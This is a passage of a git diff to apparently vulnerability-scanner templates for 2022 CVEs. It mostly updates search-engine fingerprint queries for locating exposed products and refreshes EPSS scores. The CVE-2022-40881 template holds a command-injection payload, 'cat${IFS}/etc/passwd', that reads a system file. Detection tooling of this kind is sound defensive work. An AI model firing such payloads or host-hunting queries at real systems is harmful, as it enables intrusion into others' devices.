+ - title="wi-fi app login" + - body="wavlink" google-query: intitle:"wi-fi app login" tags: cve,cve2022,packetstorm,wavlink,router,exposure diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml index 9afab472eb..ca676d0519 100644 --- a/http/cves/2022/CVE-2022-34047.yaml +++ b/http/cves/2022/CVE-2022-34047.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: wavlink product: wl-wn530hg4_firmware - shodan-query: http.title:"Wi-Fi APP Login" - fofa-query: body="wn530hg4" + shodan-query: + - http.title:"Wi-Fi APP Login" + - http.html:"wn530hg4" + - http.title:"wi-fi app login" + fofa-query: + - body="wn530hg4" + - title="wi-fi app login" google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,router,exposure,packetstorm diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml index 22243be7e6..235ddce6d1 100644 --- a/http/cves/2022/CVE-2022-34048.yaml +++ b/http/cves/2022/CVE-2022-34048.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: wavlink product: wn533a8_firmware - shodan-query: http.html:"Wavlink" - fofa-query: title="wi-fi app login" + shodan-query: + - http.html:"Wavlink" + - http.html:"wavlink" + - http.title:"wi-fi app login" + fofa-query: + - title="wi-fi app login" + - body="wavlink" google-query: intitle:"wi-fi app login" tags: cve2022,cve,wavlink,xss,router,edb diff --git a/http/cves/2022/CVE-2022-34049.yaml b/http/cves/2022/CVE-2022-34049.yaml index d6ab2d2988..b0407b382c 100644 --- a/http/cves/2022/CVE-2022-34049.yaml +++ b/http/cves/2022/CVE-2022-34049.yaml @@ -21,16 +21,21 @@ info: cvss-score: 5.3 cve-id: CVE-2022-34049 cwe-id: CWE-552 - epss-score: 0.17111 - epss-percentile: 0.95601 + epss-score: 0.16814 + epss-percentile: 0.9604 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: wavlink product: wl-wn530hg4_firmware - shodan-query: http.title:"Wi-Fi APP Login" - fofa-query: body="wn530hg4" + shodan-query: + - http.title:"Wi-Fi APP Login" + - http.html:"wn530hg4" + - http.title:"wi-fi app login" + fofa-query: + - body="wn530hg4" + - title="wi-fi app login" google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,router,exposure diff --git a/http/cves/2022/CVE-2022-34328.yaml b/http/cves/2022/CVE-2022-34328.yaml index 8059932da0..3532ec42c2 100644 --- a/http/cves/2022/CVE-2022-34328.yaml +++ b/http/cves/2022/CVE-2022-34328.yaml @@ -29,9 +29,14 @@ info: max-request: 1 vendor: sigb product: pmb - shodan-query: http.html:"PMB Group" - fofa-query: body="pmb group" - tags: cve,cve2022,pmb,xss,pmb_project + shodan-query: + - http.html:"PMB Group" + - http.html:"pmb group" + - http.favicon.hash:1469328760 + fofa-query: + - body="pmb group" + - icon_hash=1469328760 + tags: cve,cve2022,pmb,xss,pmb_project,sigb http: - method: GET diff --git a/http/cves/2022/CVE-2022-34534.yaml b/http/cves/2022/CVE-2022-34534.yaml index d997949422..21b69f6044 100644 --- a/http/cves/2022/CVE-2022-34534.yaml +++ b/http/cves/2022/CVE-2022-34534.yaml @@ -22,7 +22,9 @@ info: max-request: 1 vendor: dw product: spectrum_server_firmware - shodan-query: http.favicon.hash:868509217 + shodan-query: + - http.favicon.hash:868509217 + - http.favicon.hash:"868509217" fofa-query: icon_hash="868509217" tags: cve,cve2022,digital-watchdog,dw,spectrum,exposure diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml index e6174ed181..5728c1efde 100644 --- a/http/cves/2022/CVE-2022-34576.yaml +++ b/http/cves/2022/CVE-2022-34576.yaml @@ -28,8 +28,13 @@ info: max-request: 1 vendor: wavlink product: wn535g3_firmware - shodan-query: http.html:"Wavlink" - fofa-query: title="wi-fi app login" + shodan-query: + - http.html:"Wavlink" + - http.html:"wavlink" + - http.title:"wi-fi app login" + fofa-query: + - title="wi-fi app login" + - body="wavlink" google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,exposure diff --git a/http/cves/2022/CVE-2022-34590.yaml b/http/cves/2022/CVE-2022-34590.yaml index b69e643396..f90d9f91c6 100644 --- a/http/cves/2022/CVE-2022-34590.yaml +++ b/http/cves/2022/CVE-2022-34590.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: hospital_management_system_project product: hospital_management_system - shodan-query: http.html:"Hospital Management System" + shodan-query: + - http.html:"Hospital Management System" + - http.html:"hospital management system" fofa-query: body="hospital management system" tags: cve,cve2022,hms,cms,sqli,hospital_management_system_project diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml index e287a58f1b..31416a3cbd 100644 --- a/http/cves/2022/CVE-2022-34753.yaml +++ b/http/cves/2022/CVE-2022-34753.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: schneider-electric product: spacelogic_c-bus_home_controller_firmware - shodan-query: html:"SpaceLogic C-Bus" + shodan-query: + - html:"SpaceLogic C-Bus" + - http.html:"spacelogic c-bus" fofa-query: body="spacelogic c-bus" tags: cve2022,cve,iot,spacelogic,rce,oast,packetstorm,schneider-electric diff --git a/http/cves/2022/CVE-2022-3506.yaml b/http/cves/2022/CVE-2022-3506.yaml index d6fd9106bc..90bdd1423a 100644 --- a/http/cves/2022/CVE-2022-3506.yaml +++ b/http/cves/2022/CVE-2022-3506.yaml @@ -15,13 +15,14 @@ info: - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828 - https://github.com/barrykooij/related-posts-for-wp/commit/37733398dd88863fc0bdb3d6d378598429fd0b81 - https://nvd.nist.gov/vuln/detail/CVE-2022-3506 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-3506 cwe-id: CWE-79 - epss-score: 0.00135 - epss-percentile: 0.48543 + epss-score: 0.00144 + epss-percentile: 0.50194 cpe: cpe:2.3:a:never5:related_posts:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml index 8bfa02f8eb..86a9dd4b38 100644 --- a/http/cves/2022/CVE-2022-35151.yaml +++ b/http/cves/2022/CVE-2022-35151.yaml @@ -21,16 +21,20 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35151 cwe-id: CWE-79 - epss-score: 0.02148 - epss-percentile: 0.8906 + epss-score: 0.0157 + epss-percentile: 0.87243 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: keking product: kkfileview - shodan-query: http.html:"kkFileView" - fofa-query: body="kkfileview" + shodan-query: + - http.html:"kkFileView" + - http.html:"kkfileview" + fofa-query: + - body="kkfileview" + - app="kkfileview" tags: cve,cve2022,xss,kkfileview,keking http: diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index d0402ebb9e..8353348233 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: zohocorp product: manageengine_access_manager_plus - shodan-query: http.title:"ManageEngine" + shodan-query: + - http.title:"ManageEngine" + - http.title:"manageengine" fofa-query: title="manageengine" google-query: intitle:"manageengine" tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf,kev,zohocorp diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml index 31149b221d..d67db09e2a 100644 --- a/http/cves/2022/CVE-2022-35413.yaml +++ b/http/cves/2022/CVE-2022-35413.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: pentasecurity product: wapples - shodan-query: http.title:"Intelligent WAPPLES" + shodan-query: + - http.title:"Intelligent WAPPLES" + - http.title:"intelligent wapples" fofa-query: title="intelligent wapples" google-query: intitle:"intelligent wapples" tags: cve,cve2022,wapples,firewall,default-login,pentasecurity diff --git a/http/cves/2022/CVE-2022-35493.yaml b/http/cves/2022/CVE-2022-35493.yaml index aac718e87b..8507f7781e 100644 --- a/http/cves/2022/CVE-2022-35493.yaml +++ b/http/cves/2022/CVE-2022-35493.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: wrteam product: eshop_-_ecommerce_\/_store_website - shodan-query: http.html:"eShop - Multipurpose Ecommerce" + shodan-query: + - http.html:"eShop - Multipurpose Ecommerce" + - http.html:"eshop - multipurpose ecommerce" fofa-query: body="eshop - multipurpose ecommerce" tags: cve,cve2022,eshop,xss,wrteam diff --git a/http/cves/2022/CVE-2022-35653.yaml b/http/cves/2022/CVE-2022-35653.yaml index aff68e65ae..91487d1f27 100644 --- a/http/cves/2022/CVE-2022-35653.yaml +++ b/http/cves/2022/CVE-2022-35653.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: moodle product: moodle - shodan-query: title:"Moodle" + shodan-query: + - title:"Moodle" + - cpe:"cpe:2.3:a:moodle:moodle" + - http.title:"moodle" fofa-query: title="moodle" google-query: intitle:"moodle" tags: cve,cve2022,moodle,xss diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index ec0a19e4d3..28c6a8b832 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml @@ -29,8 +29,12 @@ info: max-request: 1 vendor: glpi-project product: glpi - shodan-query: http.favicon.hash:"-1474875778" - fofa-query: icon_hash="-1474875778" + shodan-query: + - http.favicon.hash:"-1474875778" + - http.title:"glpi" + fofa-query: + - icon_hash="-1474875778" + - title="glpi" google-query: intitle:"glpi" tags: cve,cve2022,glpi,rce,kev,glpi-project variables: diff --git a/http/cves/2022/CVE-2022-36446.yaml b/http/cves/2022/CVE-2022-36446.yaml index dd5e534d12..1475404be1 100644 --- a/http/cves/2022/CVE-2022-36446.yaml +++ b/http/cves/2022/CVE-2022-36446.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: webmin product: webmin - shodan-query: title:"Webmin" + shodan-query: + - title:"Webmin" + - http.title:"webmin" fofa-query: title="webmin" google-query: intitle:"webmin" tags: cve,cve2022,packetstorm,webmin,rce,authenticated,edb diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml index 2157353306..7e32442cca 100644 --- a/http/cves/2022/CVE-2022-36537.yaml +++ b/http/cves/2022/CVE-2022-36537.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: zkoss product: zk_framework - shodan-query: http.title:"Server backup manager" + shodan-query: + - http.title:"Server backup manager" + - http.title:"server backup manager" fofa-query: title="server backup manager" google-query: intitle:"server backup manager" tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss diff --git a/http/cves/2022/CVE-2022-36553.yaml b/http/cves/2022/CVE-2022-36553.yaml index fd4bce5deb..979411a124 100644 --- a/http/cves/2022/CVE-2022-36553.yaml +++ b/http/cves/2022/CVE-2022-36553.yaml @@ -26,7 +26,9 @@ info: vendor: hytec product: hwl-2511-ss_firmware fofa-query: title="index" && header="lighttpd/1.4.30" - zoomeye-query: app:"Hytec Inter HWL-2511-SS" + zoomeye-query: + - app:"Hytec Inter HWL-2511-SS" + - app:"hytec inter hwl-2511-ss" tags: cve2022,cve,hytec,rce http: diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml index 447decc05c..80ad7e5aa0 100644 --- a/http/cves/2022/CVE-2022-36642.yaml +++ b/http/cves/2022/CVE-2022-36642.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: telosalliance product: omnia_mpx_node_firmware - shodan-query: http.title:"Omnia MPX Node | Login" + shodan-query: + - http.title:"Omnia MPX Node | Login" + - http.title:"omnia mpx node | login" fofa-query: title="omnia mpx node | login" google-query: intitle:"omnia mpx node | login" tags: cve,cve2022,traversal,omnia,edb,lfi,telosalliance diff --git a/http/cves/2022/CVE-2022-36883.yaml b/http/cves/2022/CVE-2022-36883.yaml index 4548af5cd1..ed48514652 100644 --- a/http/cves/2022/CVE-2022-36883.yaml +++ b/http/cves/2022/CVE-2022-36883.yaml @@ -29,7 +29,9 @@ info: vendor: jenkins product: git framework: jenkins - shodan-query: X-Jenkins + shodan-query: + - X-Jenkins + - x-jenkins tags: cve,cve2022,jenkins,plugin,git,intrusive http: diff --git a/http/cves/2022/CVE-2022-37042.yaml b/http/cves/2022/CVE-2022-37042.yaml index e66a2899cb..1260afb4fc 100644 --- a/http/cves/2022/CVE-2022-37042.yaml +++ b/http/cves/2022/CVE-2022-37042.yaml @@ -19,15 +19,20 @@ info: cvss-score: 9.8 cve-id: CVE-2022-37042 cwe-id: CWE-22 - epss-score: 0.97539 - epss-percentile: 0.99994 + epss-score: 0.97554 + epss-percentile: 0.99997 cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:* metadata: max-request: 4 vendor: zimbra product: collaboration - shodan-query: http.favicon.hash:"1624375939" - fofa-query: app="zimbra-邮件系统" + shodan-query: + - http.favicon.hash:"1624375939" + - http.favicon.hash:"475145467" + fofa-query: + - app="zimbra-邮件系统" + - icon_hash="475145467" + - icon_hash="1624375939" tags: cve,cve2022,zimbra,rce,unauth,kev http: diff --git a/http/cves/2022/CVE-2022-37153.yaml b/http/cves/2022/CVE-2022-37153.yaml index 8ffb2f30a9..8141a91e82 100644 --- a/http/cves/2022/CVE-2022-37153.yaml +++ b/http/cves/2022/CVE-2022-37153.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: articatech product: artica_proxy - shodan-query: http.html:"Artica" + shodan-query: + - http.html:"Artica" + - http.html:"artica" fofa-query: body="artica" tags: cve,cve2022,xss,artica,articatech diff --git a/http/cves/2022/CVE-2022-37191.yaml b/http/cves/2022/CVE-2022-37191.yaml index 6cd220e036..c9e2ba2d84 100644 --- a/http/cves/2022/CVE-2022-37191.yaml +++ b/http/cves/2022/CVE-2022-37191.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.5 cve-id: CVE-2022-37191 cwe-id: CWE-829 - epss-score: 0.46328 - epss-percentile: 0.97122 + epss-score: 0.39013 + epss-percentile: 0.97239 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml index 0e1e14bfce..d1261f7f9a 100644 --- a/http/cves/2022/CVE-2022-3800.yaml +++ b/http/cves/2022/CVE-2022-3800.yaml @@ -14,13 +14,14 @@ info: - https://github.com/IBAX-io/go-ibax/issues/2061 - https://vuldb.com/?id.212636 - https://nvd.nist.gov/vuln/detail/CVE-2022-3800 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-3800 - cwe-id: CWE-89,CWE-707 - epss-score: 0.05291 - epss-percentile: 0.92303 + cwe-id: CWE-707,CWE-89 + epss-score: 0.03544 + epss-percentile: 0.91587 cpe: cpe:2.3:a:ibax:go-ibax:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-38131.yaml b/http/cves/2022/CVE-2022-38131.yaml index 655d78afdb..f7fc26f4e9 100644 --- a/http/cves/2022/CVE-2022-38131.yaml +++ b/http/cves/2022/CVE-2022-38131.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: rstudio product: connect - shodan-query: "http.favicon.hash:217119619" - fofa-query: "app=\"RStudio-Connect\"" + shodan-query: + - "http.favicon.hash:217119619" + - http.title:"openvpn connect" + fofa-query: + - "app=\"RStudio-Connect\"" + - title="openvpn connect" google-query: intitle:"openvpn connect" tags: tenable,cve,cve2022,redirect,rstudio diff --git a/http/cves/2022/CVE-2022-38295.yaml b/http/cves/2022/CVE-2022-38295.yaml index 95f0612c1b..43bab2b595 100644 --- a/http/cves/2022/CVE-2022-38295.yaml +++ b/http/cves/2022/CVE-2022-38295.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-38295 cwe-id: CWE-79 - epss-score: 0.00269 - epss-percentile: 0.64416 + epss-score: 0.0024 + epss-percentile: 0.61973 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38296.yaml b/http/cves/2022/CVE-2022-38296.yaml index 8a18e4b952..6dff519aee 100644 --- a/http/cves/2022/CVE-2022-38296.yaml +++ b/http/cves/2022/CVE-2022-38296.yaml @@ -13,13 +13,14 @@ info: reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-38296 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-38296 cwe-id: CWE-434 - epss-score: 0.02351 - epss-percentile: 0.88674 + epss-score: 0.03924 + epss-percentile: 0.9198 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml index e04c5c458d..24c851082c 100644 --- a/http/cves/2022/CVE-2022-38463.yaml +++ b/http/cves/2022/CVE-2022-38463.yaml @@ -22,15 +22,20 @@ info: cve-id: CVE-2022-38463 cwe-id: CWE-79 epss-score: 0.00174 - epss-percentile: 0.53646 + epss-percentile: 0.54507 cpe: cpe:2.3:a:servicenow:servicenow:san_diego:patch_4:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: servicenow product: servicenow - shodan-query: http.title:"ServiceNow" - fofa-query: title="servicenow" + shodan-query: + - http.title:"ServiceNow" + - http.title:"servicenow" + - http.favicon.hash:1701804003 + fofa-query: + - title="servicenow" + - icon_hash=1701804003 google-query: intitle:"servicenow" tags: cve,cve2022,servicenow,xss diff --git a/http/cves/2022/CVE-2022-38467.yaml b/http/cves/2022/CVE-2022-38467.yaml index fa85aa016a..9558401adf 100644 --- a/http/cves/2022/CVE-2022-38467.yaml +++ b/http/cves/2022/CVE-2022-38467.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-38467 cwe-id: CWE-79 epss-score: 0.00092 - epss-percentile: 0.37951 + epss-percentile: 0.3922 cpe: cpe:2.3:a:crmperks:crm_perks_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml index 2568e62f01..f49c0a2055 100644 --- a/http/cves/2022/CVE-2022-38553.yaml +++ b/http/cves/2022/CVE-2022-38553.yaml @@ -29,9 +29,11 @@ info: max-request: 1 vendor: creativeitem product: academy_learning_management_system - google-query: intext:"Study any topic, anytime" shodan-query: http.html:"study any topic, anytime" fofa-query: body="study any topic, anytime" + google-query: + - intext:"Study any topic, anytime" + - intext:"study any topic, anytime" tags: cve2022,cve,academylms,xss,creativeitem http: diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml index 751c6e1847..325eb6ea97 100644 --- a/http/cves/2022/CVE-2022-38637.yaml +++ b/http/cves/2022/CVE-2022-38637.yaml @@ -21,15 +21,17 @@ info: cvss-score: 9.8 cve-id: CVE-2022-38637 cwe-id: CWE-89 - epss-score: 0.01231 - epss-percentile: 0.85126 + epss-score: 0.04195 + epss-percentile: 0.92211 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: hospital_management_system_project product: hospital_management_system - shodan-query: http.html:"Hospital Management System" + shodan-query: + - http.html:"Hospital Management System" + - http.html:"hospital management system" fofa-query: body="hospital management system" tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project diff --git a/http/cves/2022/CVE-2022-38817.yaml b/http/cves/2022/CVE-2022-38817.yaml index beec3bb0bf..7537ee8854 100644 --- a/http/cves/2022/CVE-2022-38817.yaml +++ b/http/cves/2022/CVE-2022-38817.yaml @@ -28,7 +28,9 @@ info: max-request: 3 vendor: linuxfoundation product: dapr_dashboard - shodan-query: http.title:"Dapr Dashboard" + shodan-query: + - http.title:"Dapr Dashboard" + - http.title:"dapr dashboard" fofa-query: title="dapr dashboard" google-query: intitle:"dapr dashboard" tags: cve,cve2022,dapr,dashboard,unauth,linuxfoundation diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml index 706f6a28c1..c33866d0b0 100644 --- a/http/cves/2022/CVE-2022-38870.yaml +++ b/http/cves/2022/CVE-2022-38870.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: free5gc product: free5gc - shodan-query: http.title:"free5GC Web Console" + shodan-query: + - http.title:"free5GC Web Console" + - http.title:"free5gc web console" fofa-query: title="free5gc web console" google-query: intitle:"free5gc web console" tags: cve,cve2022,free5gc,exposure diff --git a/http/cves/2022/CVE-2022-39048.yaml b/http/cves/2022/CVE-2022-39048.yaml index 77603026e6..81824e1f91 100644 --- a/http/cves/2022/CVE-2022-39048.yaml +++ b/http/cves/2022/CVE-2022-39048.yaml @@ -24,8 +24,13 @@ info: max-request: 3 vendor: servicenow product: servicenow - shodan-query: http.title:"ServiceNow" - fofa-query: title="servicenow" + shodan-query: + - http.title:"ServiceNow" + - http.title:"servicenow" + - http.favicon.hash:1701804003 + fofa-query: + - title="servicenow" + - icon_hash=1701804003 google-query: intitle:"servicenow" tags: cve,cve2022,xss,servicenow,authenticated diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml index f2443e7cdc..4367d97008 100644 --- a/http/cves/2022/CVE-2022-39195.yaml +++ b/http/cves/2022/CVE-2022-39195.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: lsoft product: listserv - shodan-query: http.html:"LISTSERV" + shodan-query: + - http.html:"LISTSERV" + - http.html:"listserv" fofa-query: body="listserv" tags: cve,cve2022,xss,listserv,packetstorm,lsoft diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index 995836d282..6059daa30a 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -27,8 +27,13 @@ info: max-request: 1 vendor: sophos product: mobile - shodan-query: http.favicon.hash:-1274798165 - fofa-query: title="Sophos Mobile" + shodan-query: + - http.favicon.hash:-1274798165 + - http.title:"sophos mobile" + fofa-query: + - title="Sophos Mobile" + - icon_hash=-1274798165 + - title="sophos mobile" google-query: intitle:"sophos mobile" tags: cve,cve2022,xxe,ssrf,sophos diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index a720a454db..ff8097dac3 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: fortinet product: fortinac - shodan-query: title:"FortiNAC" + shodan-query: + - title:"FortiNAC" + - http.title:"fortinac" fofa-query: title="fortinac" google-query: intitle:"fortinac" tags: cve,cve2022,fortinet,fortinac,fileupload,rce,intrusive diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml index 2d8c4e0e5b..3b67b7be9e 100644 --- a/http/cves/2022/CVE-2022-39960.yaml +++ b/http/cves/2022/CVE-2022-39960.yaml @@ -30,7 +30,9 @@ info: vendor: netic product: group_export framework: jira - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2022,atlassian,jira,netic,unauth http: diff --git a/http/cves/2022/CVE-2022-40047.yaml b/http/cves/2022/CVE-2022-40047.yaml index 04a2881288..bcc7adcddc 100644 --- a/http/cves/2022/CVE-2022-40047.yaml +++ b/http/cves/2022/CVE-2022-40047.yaml @@ -23,8 +23,12 @@ info: max-request: 2 vendor: flatpress product: flatpress - shodan-query: http.html:"flatpress" - fofa-query: body="flatpress" + shodan-query: + - http.html:"flatpress" + - http.favicon.hash:-1189292869 + fofa-query: + - body="flatpress" + - icon_hash=-1189292869 tags: cve,cve2022,flatpress,authenticated,xss,intrusive variables: randstring: "{{to_lower(rand_base(16))}}" diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml index 945d8d35a3..9314a2628e 100644 --- a/http/cves/2022/CVE-2022-40127.yaml +++ b/http/cves/2022/CVE-2022-40127.yaml @@ -29,9 +29,18 @@ info: max-request: 3 vendor: apache product: airflow - shodan-query: title:"Sign In - Airflow" - fofa-query: title="sign in - airflow" - google-query: intitle:"sign in - airflow" + shodan-query: + - title:"Sign In - Airflow" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + - product:"redis" + fofa-query: + - title="sign in - airflow" + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + google-query: + - intitle:"sign in - airflow" + - intitle:"airflow - dags" || http.html:"apache airflow" tags: cve,cve2022,airflow,rce,oast,authenticated,apache http: diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml index b478fb995a..39a6c084e7 100644 --- a/http/cves/2022/CVE-2022-4049.yaml +++ b/http/cves/2022/CVE-2022-4049.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4049 cwe-id: CWE-89 - epss-score: 0.04217 - epss-percentile: 0.92045 + epss-score: 0.04713 + epss-percentile: 0.92631 cpe: cpe:2.3:a:wp_user_project:wp_user:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -25,9 +25,9 @@ info: vendor: wp_user_project product: wp_user framework: wordpress - publicwww-query: /wp-content/plugins/wp-user/ shodan-query: http.html:/wp-content/plugins/wp-user/ fofa-query: body=/wp-content/plugins/wp-user/ + publicwww-query: /wp-content/plugins/wp-user/ tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project http: diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml index 2b2b7709de..6d66b86386 100644 --- a/http/cves/2022/CVE-2022-4057.yaml +++ b/http/cves/2022/CVE-2022-4057.yaml @@ -28,9 +28,9 @@ info: vendor: optimizingmatters product: autooptimize framework: wordpress - publicwww-query: /wp-content/plugins/autoptimize shodan-query: http.html:/wp-content/plugins/autoptimize fofa-query: body=/wp-content/plugins/autoptimize + publicwww-query: /wp-content/plugins/autoptimize tags: cve,cve2022,wpscan,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters http: diff --git a/http/cves/2022/CVE-2022-4059.yaml b/http/cves/2022/CVE-2022-4059.yaml index 816d2ce143..bac75cfd07 100644 --- a/http/cves/2022/CVE-2022-4059.yaml +++ b/http/cves/2022/CVE-2022-4059.yaml @@ -25,9 +25,9 @@ info: vendor: blocksera product: cryptocurrency_widgets_pack framework: wordpress - publicwww-query: /wp-content/plugins/cryptocurrency-widgets-pack/ shodan-query: http.html:/wp-content/plugins/cryptocurrency-widgets-pack/ fofa-query: body=/wp-content/plugins/cryptocurrency-widgets-pack/ + publicwww-query: /wp-content/plugins/cryptocurrency-widgets-pack/ tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli,blocksera http: diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml index 304af08190..75ac502f3e 100644 --- a/http/cves/2022/CVE-2022-40734.yaml +++ b/http/cves/2022/CVE-2022-40734.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: unisharp product: laravel_filemanager - shodan-query: http.html:"Laravel Filemanager" + shodan-query: + - http.html:"Laravel Filemanager" + - http.html:"laravel filemanager" fofa-query: body="laravel filemanager" tags: cve,cve2022,laravel,unisharp,lfi,traversal diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml index d9cb8ada39..89c55b804d 100644 --- a/http/cves/2022/CVE-2022-40879.yaml +++ b/http/cves/2022/CVE-2022-40879.yaml @@ -29,8 +29,12 @@ info: max-request: 1 vendor: keking product: kkfileview - shodan-query: http.html:"kkFileView" - fofa-query: body="kkfileview" + shodan-query: + - http.html:"kkFileView" + - http.html:"kkfileview" + fofa-query: + - body="kkfileview" + - app="kkfileview" tags: cve,cve2022,kkFileView,xss,keking http: diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml index 38c81c3963..73ee07473c 100644 --- a/http/cves/2022/CVE-2022-40881.yaml +++ b/http/cves/2022/CVE-2022-40881.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: contec product: solarview_compact - shodan-query: http.favicon.hash:"-244067125" + shodan-query: + - http.favicon.hash:"-244067125" + - cpe:"cpe:2.3:h:contec:solarview_compact" tags: cve,cve2022,solarview,rce,lfi,contec variables: cmd: "cat${IFS}/etc/passwd" diff --git a/http/cves/2022/CVE-2022-41412.yaml b/http/cves/2022/CVE-2022-41412.yaml index 09867aabce..a218815aa2 100644 --- a/http/cves/2022/CVE-2022-41412.yaml +++ b/http/cves/2022/CVE-2022-41412.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: perfsonar product: perfsonar - fofa-query: title="perfSONAR Toolkit" + fofa-query: + - title="perfSONAR Toolkit" + - 